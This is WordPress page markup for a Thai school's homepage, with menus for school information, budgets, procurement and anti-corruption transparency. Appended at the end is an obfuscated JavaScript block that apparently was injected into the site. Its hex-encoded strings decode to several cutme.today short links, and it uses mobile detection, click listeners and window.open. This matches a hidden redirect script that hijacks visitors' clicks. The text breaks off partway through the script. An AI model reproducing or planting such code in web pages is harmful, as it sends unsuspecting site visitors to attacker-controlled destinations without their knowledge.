"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลผู้บริหาร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลบุคลากร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลนักเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_5a5d38-a9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_5a5d38-a9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูล O-NET</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingBgColor\":\"#0a71ad\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"readmoreBgColor\":\"#0a71ad\",\"readmoreMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}}} /-->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>โครงสร้าง</strong></td></tr><tr><td><strong>ข้อมูลผู้บริหาร</strong></td></tr><tr><td><strong>อำนาจหน้าที่</strong></td></tr><tr><td><strong>ข้อมูลการติดต่อ</strong></td></tr><tr><td><strong>ข่าวประชาสัมพันธ์</strong></td></tr><tr><td><strong>Q&amp;A</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong>E-Service</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"headingBgColor\":\"#00000000\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleWeight\":\"500\",\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const 